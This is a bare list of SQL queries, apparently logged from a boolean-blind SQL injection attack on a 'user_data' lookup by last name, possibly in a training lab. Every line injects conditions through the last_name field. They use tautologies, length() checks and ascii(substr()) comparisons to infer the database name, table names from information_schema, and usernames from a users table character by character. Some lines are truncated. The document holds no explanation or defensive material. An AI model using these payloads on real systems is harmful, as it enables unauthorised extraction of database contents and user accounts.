SELECT * FROM user_data WHERE last_name = '1' AND 4570=4570 AND 'ZeoB'='ZeoB;
SELECT * FROM user_data WHERE last_name = '1' AND 4570=4570 AND 'ZeoB'='ZeoBFalse;
SELECT * FROM user_data WHERE last_name = '1' AND (length(database())) = 15 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (length(database())) = 11 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select database()),1,1))) > 110 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select database()),1,1))) > 109 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select database()),2,1))) > 97 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select database()),2,1))) > 115 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 4 --+;
SELECT * FROM user_data WHERE last_name = '1;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 5 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 6 --+;
SELECT * FROM user_data WHERE last_name = '1;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 108 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 114 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 116 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,1) ,1,1))) > 96 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,1) ,1,1))) > 105 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,1) ,1,1))) > 114 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select username from users limit 0,1))) = 6 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select username from users limit 0,1))) = 4 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select username from users limit 1,1))) = 6 --+;
SELECT * FROM user_data WHERE last_name = '1;
SELECT * FROM user_data WHERE last_name = '1' AND (length((select username from users limit 2,1))) = 5 --+;
SELECT * FROM user_data WHERE last_name = '1;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 111 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select username from users limit 1,1) ,1,1))) > 96 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select username from users limit 2,1) ,1,1))) > 114 --+;
SELECT * FROM user_data WHERE last_name = '1' AND (ascii(substr((select username from users limit 3,1) ,1,1))) > 114 --+;